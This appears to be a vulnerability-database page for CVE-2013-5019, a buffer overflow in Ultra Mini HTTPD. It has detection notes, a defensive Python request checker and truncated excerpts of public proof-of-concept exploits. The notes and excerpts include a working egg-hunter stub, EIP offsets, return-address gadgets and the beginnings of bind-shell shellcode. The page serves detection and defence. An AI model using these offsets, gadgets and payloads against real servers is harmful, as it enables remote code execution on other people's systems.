CVE-2013-5019
Published 2013-07-31
CVE-2013-5019: Stack-based buffer overflow in Ultra Mini HTTPD 1.21 allows remote attackers to execute arbitrary code via a long resource name in an HTTP request.
Priority: P2 76, critical, CVSS 2.0: 10
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 64.39% (99.1th percentile)
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| vector | ultra_mini_httpd | — | — |
Detection & IOCs (extracted from sources)
- BadChars: \x00\x09\x0a\x0b\x0c\x0d\x20\x2f\x3f
- Egg hunter tag: no0bno0b (\x6e\x6f\x30\x62\x6e\x6f\x30\x62)
- Egg hunter stub: \x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x6e\x6f\x30\x62\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7
- Detect HTTP GET requests with a URI longer than 5392 bytes followed by a 4-byte little-endian return address and NOP sled pattern targeting Ultra Mini HTTPD.
- Detect HTTP POST requests with a body/URI exceeding 5438 bytes, characteristic of the POST-based buffer overflow variant against Ultra Mini HTTPD 1.21.
- Monitor for the egg-hunter tag string 'no0bno0b' appearing in HTTP request URIs, which is used by the Windows 7 PoC exploit to locate shellcode in memory.
- The exploit's request handler thread is terminated after 60 seconds by a monitor thread; exploits may use VirtualAlloc + CreateThread + SuspendThread stager patterns to survive this. Look for these API call sequences in memory or network payloads.
- The Metasploit module uses a StackAdjustment of -3500 bytes; look for large negative ESP adjustments (e.g., \x81\xc4\xf0\xea\xff\xff = add esp,-0x1510) immediately after EIP control in shellcode stagers.
- Return addresses (JMP ESP / CALL ESP gadgets) are module-specific and vary by OS version: 0x77c354b4 (msvcrt.dll, XP SP3), 0x7C941EED (ntdll.dll, XP SP2), 0x7E429353 (user.dll, XP SP3), 0x764046cd (msvcrt.dll, Win7 32-bit). Detection rules relying on these hardcoded values will miss exploits retargeted to other environments.
- The EIP offset differs between GET (5412/5392) and POST (5438) exploit variants; detection thresholds must account for both request methods.
- Bad characters \x00\x09\x0a\x0b\x0c\x0d\x20\x2f\x3f are filtered by the application; encoded shellcode will not contain these bytes, so byte-level signature detection must account for encoding (e.g., shikata_ga_nai).
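The length and tag checks from the notes above, as an added example (not code from any of the indexed sources). The raw-byte check is an added assumption: request targets should be ASCII, so high bytes flag binary content without depending on a specific return address or encoder. The function name, finding labels and sample requests are constructed.

```python
# Added example: heuristics for CVE-2013-5019 request patterns. Limits and tag
# come from the detection notes above; names and samples are constructed.
URI_LIMITS = {b"GET": 5392, b"POST": 5438}  # per-method offsets from the notes
FALLBACK_LIMIT = min(URI_LIMITS.values())   # assumption: strictest limit otherwise
EGG_TAG = b"no0bno0b"


def inspect_request(raw: bytes) -> list[str]:
    """Return findings for one raw HTTP request (empty list if clean)."""
    # The request line ends at the first CRLF; an overflow attempt may omit
    # it entirely, so fall back to the whole buffer.
    line = raw.split(b"\r\n", 1)[0]
    method, _, rest = line.partition(b" ")
    # A request target cannot contain a space, so the last space (if any)
    # separates it from the HTTP version.
    target, sep, _version = rest.rpartition(b" ")
    if not sep:
        target = rest
    findings = []
    limit = URI_LIMITS.get(method.upper(), FALLBACK_LIMIT)
    if len(target) > limit:
        findings.append(f"uri-length {len(target)} > {limit}")
    if EGG_TAG in target:
        findings.append("egg-tag")
    # Non-ASCII bytes must be percent-encoded in a valid target, so raw high
    # bytes indicate binary data whatever gadget address or encoder was used.
    high = sum(1 for b in target if b >= 0x80)
    if high:
        findings.append(f"raw-binary {high} bytes")
    return findings


# Constructed sample requests (filler bytes only, no payloads).
SAMPLES = {
    "benign": b"GET /index.html HTTP/1.1\r\nHost: example\r\n\r\n",
    "long-get": b"GET /" + b"A" * 5400 + b" HTTP/1.1\r\n\r\n",
    "long-post": b"POST /" + b"A" * 5438 + b" HTTP/1.1\r\n\r\n",
    "no-terminator": b"GET /" + b"A" * 6000,
    "tagged": b"GET /no0bno0b\xff\xfe HTTP/1.1\r\n\r\n",
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(name, inspect_request(raw) or "clean")
```

In production a far lower URI length limit at a reverse proxy or WAF would reject these requests before they reach the server; the limits here only mirror the offsets quoted on this page.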
No detection rules found.
Exploit-DB
Ultra MiniHTTPd 1.2 - 'GET' Remote Stack Buffer Overflow (PoC)
exploitdb·2018-04-17·CVSS 10.0
---
# Exploit Title: Ultra MiniHTTPd 1.2 - 'GET' Remote Stack Buffer Overflow
# Date: 2018-04-14
# Exploit Author: jollymongrel
# Vendor Homepage: http://www.vector.co.jp
# Software Link: http://www.vector.co.jp/soft/winnt/net/se275154.html
# Version: 1.2
# Tested on: Windows 7 32-bit
# CVE : CVE-2013-5019
import sys
import socket
import struct
eip = struct.pack('I', 0x764046cd) #call esp [msvcrt.dll]
#windows/exec - 274 bytes
#http://www.metasploit.com
#Encoder: x86/shikata_ga_nai
#EXITFUNC=thread
#CMD=calc.exe
#badchars='\x00\x09\x0a\x0b\x0c\x0d\x20\x2f\x3f'
shellcode = ("no0bno0b"+"\xb8\x21\xa0\xa2\xbd\xdb\xd1\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"
"\x3e\x31\x43\x15\x83\xc3\x04\x03\x43\x11\xe2\xd4\x1a\x51\xd8"
"\x25\xbd\x4c\x
Exploit-DB
Ultra Mini HTTPd 1.21 - 'POST' Remote Stack Buffer Overflow (2)
exploitdb·2014-02-22
---
#!/usr/bin/python
#
# Title: Mini HTTPD stack buffer overflow POST exploit
# Author: TheColonial
# Date: 20 Feb 2013
# Software Link: http://www.vector.co.jp/soft/winnt/net/se275154.html
# Vendor Homepage: http://www.picolix.jp/
# Version: 1.21
# Tested on: Windows XP Professional SP3
#
# Description:
# This is a slightly more weaponised version of the Mini HTTPD buffer overflow
# written by Sumit, located here: http://www.exploit-db.com/exploits/31736/
# I wrote this up because the existing version had a hard-coded payload and
# didn't work on any of my XP boxes.
#
# The instability of the existing is down to bad chars, and the parent thread
# killing off the child thread when the thing is still running. This exploit
#
Exploit-DB
Ultra Mini HTTPd 1.21 - 'POST' Remote Stack Buffer Overflow (1)
exploitdb·2014-02-18
---
# Exploit Title: Ultra Mini HTTPD stack buffer overflow POST request
# Date: 16 Feb 2014
# Exploit Author: Sumit
# Vendor Homepage: http://www.picolix.jp/
# Software Link: http://www.vector.co.jp/soft/winnt/net/se275154.html
# Version: 1.21
# Tested on: Windows XP Professional SP3
#
# Description:
# A buffer overflow is triggered when requesting a very long url in POST request
#
import socket
shellcode = ( # msfvenom windows/shell_bind_tcp -b '\x00\x09\x0a\x0b\x0c\x0d\x20'
"\xd9\xea\xba\x03\xc9\x19\xa6\xd9\x74\x24\xf4\x58\x29\xc9" +
"\xb1\x56\x31\x50\x18\x83\xe8\xfc\x03\x50\x17\x2b\xec\x5a" +
"\xff\x22\x0f\xa3\xff\x54\x99\x46\xce\x46\xfd\x03\x62\x57" +
"\x75\x41\x8e\x1c\xdb\x72\x05\x50\xf4\x75\xae\xdf\x22\xbb" +
"\x2f\
Exploit-DB
Ultra Mini HTTPd - Remote Stack Buffer Overflow (Metasploit)
exploitdb·2013-08-15
---
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 "Ultra Mini HTTPD Stack Buffer Overflow",
'Description' => %q{
This module exploits a stack based buffer overflow in Ultra Mini HTTPD 1.21
allowing remote attackers to execute arbitrary code via a long resource name in an HTTP
request.
},
'License' => MSF_LICENSE,
'Author' =>
[
'superkojiman', #Discovery, PoC
'PsychoSpy ' #Metasploit
],
'References' =>
[
['OSVDB', '95164'],
['EDB','26739'],
['CVE','2013-5019'],
['BID','61130']
],
'Pay
Exploit-DB
Ultra Mini HTTPd 1.21 - Remote Stack Buffer Overflow
exploitdb·2013-07-11
---
# Exploit Title: Ultra Mini HTTPD stack buffer overflow
# Date: 10 July 2013
# Exploit Author: superkojiman - http://www.techorganic.com
# Vendor Homepage: http://www.picolix.jp/
# Software Link: http://www.vector.co.jp/soft/winnt/net/se275154.html
# Version: 1.21
# Tested on: Windows XP Professional SP2, English
#
# Description:
# A buffer overflow is triggered when requesting a very long
# resource name.
#
import socket
import struct
# msfpayload windows/shell_bind_tcp R | \
# msfencode -b "\x00\x0a\x0d\x20\x0b\x09\x0c"
# [*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)
shellcode = (
"\xba\x1f\xb5\xae\xa1\xdd\xc4\xd9\x74\x24\xf4\x5e\x33\xc9" +
"\xb1\x56\x31\x56\x13\x83\xc6\x04\x03\x56\x10\x57\x5b\x5d" +
"\xc6\x1e\x
Metasploit
Ultra Mini HTTPD Stack Buffer Overflow
metasploit
This module exploits a stack based buffer overflow in Ultra Mini HTTPD 1.21, allowing remote attackers to execute arbitrary code via a long resource name in an HTTP request. This exploit has to deal with the fact that the application's request handler thread is terminated after 60 seconds by a "monitor" thread. To do this, it allocates some RWX memory, copies the payload to it and creates another thread. When done, it terminates the current thread so that it doesn't crash and hence doesn't bring down the process with it.
No writeups or analysis indexed.
- http://osvdb.org/show/osvdb/95164
- http://www.exploit-db.com/exploits/26739
- http://www.exploit-db.com/exploits/31736
- http://www.exploit-db.com/exploits/31814
- http://www.securityfocus.com/bid/61130
- https://exchange.xforce.ibmcloud.com/vulnerabilities/85599
- https://www.exploit-db.com/exploits/44472/